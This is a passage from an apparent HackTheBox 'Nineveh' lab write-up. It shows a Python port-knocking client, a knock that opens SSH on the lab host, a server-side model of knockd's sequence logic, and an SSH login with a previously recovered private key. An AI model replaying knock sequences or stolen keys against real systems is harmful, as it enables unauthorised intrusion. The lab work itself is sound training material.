Amrois


Now that I know the three-port knock sequence, I need to replay it against the target so that the daemon behind it opens the protected port.

Knockd Python Client


import argparse
import socket
import time


def knock(host, knock_seq, delay, protocol):
    """Send one connection attempt per port in knock_seq, sleeping `delay` seconds between knocks."""
    for port in knock_seq:
        if protocol == 'tcp':
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        else:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Non-blocking: a TCP connect() only has to put the SYN on the wire, which is
        # all the knock daemon looks for; it raises BlockingIOError at once, so ignore it.
        sock.setblocking(False)

        try:
            if protocol == 'tcp':
                sock.connect((host, port))
            else:
                # connect() on a UDP socket sends nothing, so emit an empty datagram instead.
                sock.sendto(b'', (host, port))
        except socket.error:
            pass
        finally:
            sock.close()
        time.sleep(delay)


def main():
    parser = argparse.ArgumentParser(prog='knocker', description=knock.__doc__)
    parser.add_argument('host', help='Hostname or IP address of the host')
    parser.add_argument('ports', nargs='+', type=int, help='Ports to knock (space as separator)')
    parser.add_argument('-d', '--delay', type=int, default=200,
                        help='Milliseconds between each knock')
    parser.add_argument('-p', '--protocol', choices=['tcp', 'udp'], default='tcp')

    args = parser.parse_args()

    print('Knocking...')
    knock(args.host, args.ports, args.delay / 1000, args.protocol)


if __name__ == '__main__':
    main()

For that, I used the very simple knockd client above.

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ python3 knocker.py $IP 571 290 911 
Knocking...
 
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ nmap $IP -p22                  
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 01:33 CET
Nmap scan report for 10.10.10.43
Host is up (0.031s latency).
 
PORT   STATE SERVICE
22/tcp open  ssh
 
Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds

Target port 22 is now open and listening.
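To show what the knock daemon on the other side is doing with those SYNs, here is a small server-side model of the knockd state machine, written as an added example for this writeup (it is not the page's client and not knockd's own code). It tracks each source address through the sequence, discards a partial sequence on a wrong port, and enforces a per-sequence timeout in the style of knockd's seq_timeout. The input is a handful of constructed iptables-style log lines with a hypothetical "KNOCK:" log prefix; the addresses, timestamps and the 571/290/911 sequence values are assumptions for the example.

```python
import re
from datetime import datetime

# Constructed sample log lines (not a real capture): three sources hit the firewall.
# 10.10.14.5 knocks in the right order within one second.
# 10.10.14.7 hits the same three ports but out of order.
# 10.10.14.9 knocks in order but takes ten seconds to finish.
SAMPLE_LOG = """\
Jan 17 01:32:10 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.5 DST=10.10.10.43 PROTO=TCP DPT=571
Jan 17 01:32:10 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.5 DST=10.10.10.43 PROTO=TCP DPT=290
Jan 17 01:32:11 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.5 DST=10.10.10.43 PROTO=TCP DPT=911
Jan 17 01:32:20 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.7 DST=10.10.10.43 PROTO=TCP DPT=290
Jan 17 01:32:20 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.7 DST=10.10.10.43 PROTO=TCP DPT=571
Jan 17 01:32:21 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.7 DST=10.10.10.43 PROTO=TCP DPT=911
Jan 17 01:32:30 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.9 DST=10.10.10.43 PROTO=TCP DPT=571
Jan 17 01:32:31 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.9 DST=10.10.10.43 PROTO=TCP DPT=290
Jan 17 01:32:40 nineveh kernel: KNOCK: IN=ens160 SRC=10.10.14.9 DST=10.10.10.43 PROTO=TCP DPT=911
"""

LOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) .*?SRC=(\S+) .*?DPT=(\d+)")
EPOCH = datetime(2023, 1, 1)  # assumed year; only differences between timestamps matter


def parse_line(line):
    """Return (seconds, src_ip, dport) for one log line, or None if it is not a knock log."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime("2023 " + m.group(1), "%Y %b %d %H:%M:%S")
    return (ts - EPOCH).total_seconds(), m.group(2), int(m.group(3))


class KnockTracker:
    """Per-source progress through a fixed port sequence, knockd style."""

    def __init__(self, sequence, seq_timeout=5.0):
        self.sequence = tuple(sequence)
        self.seq_timeout = seq_timeout      # seconds allowed for the whole sequence
        self._state = {}                    # src -> (next_index, time_of_first_knock)
        self.opened = []                    # sources that completed the sequence, in order

    def observe(self, ts, src, dport):
        """Feed one connection attempt; return True when src has completed the sequence."""
        idx, start = self._state.get(src, (0, ts))
        if idx > 0 and ts - start > self.seq_timeout:
            idx = 0                          # took too long: forget the partial sequence
        if dport != self.sequence[idx]:
            idx = 0                          # wrong port: partial sequence is discarded
            if dport != self.sequence[0]:    # and this packet is not a fresh first knock
                self._state.pop(src, None)
                return False
        if idx == 0:
            start = ts                       # (re)start the timeout clock on the first knock
        idx += 1
        if idx == len(self.sequence):
            self._state.pop(src, None)
            self.opened.append(src)
            return True
        self._state[src] = (idx, start)
        return False


def replay(log_text, sequence, seq_timeout=5.0):
    """Run the tracker over log lines; return the sources that would have been granted access."""
    tracker = KnockTracker(sequence, seq_timeout)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed:
            tracker.observe(*parsed)
    return tracker.opened


if __name__ == "__main__":
    print("opened with 5s timeout: ", replay(SAMPLE_LOG, (571, 290, 911)))
    print("opened with 15s timeout:", replay(SAMPLE_LOG, (571, 290, 911), seq_timeout=15.0))
```

Two things fall out of the model that matter for anyone running or reviewing a knockd setup: ordering is enforced (a scanner sweeping the three ports ascending never completes the sequence), and the timeout value decides whether a slow or rate-limited knocker gets in at all, which is why the client's inter-knock delay has to stay well inside the daemon's seq_timeout.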

I can now SSH straight in with the private key that I recovered earlier from the image.

SSH


┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ssh amrois@$IP -i id_rsa.amrois 
The authenticity of host '10.10.10.43 (10.10.10.43)' can't be established.
ED25519 key fingerprint is SHA256:kxSpgxC8gaU9OypTJXFLmc/2HKEmnDMIjzkkUiGLyuI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.43' (ED25519) to the list of known hosts.
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ whoami
amrois
amrois@nineveh:~$ hostname
nineveh
amrois@nineveh:~$ ifconfig
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:17:ee  
          inet addr:10.10.10.43  Bcast:10.10.10.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:539 errors:0 dropped:0 overruns:0 frame:0
          TX packets:726 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:63600 (63.6 KB)  TX bytes:109615 (109.6 KB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:160 errors:0 dropped:0 overruns:0 frame:0
          TX packets:160 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:11840 (11.8 KB)  TX bytes:11840 (11.8 KB)

Lateral Movement to the amrois user via SSH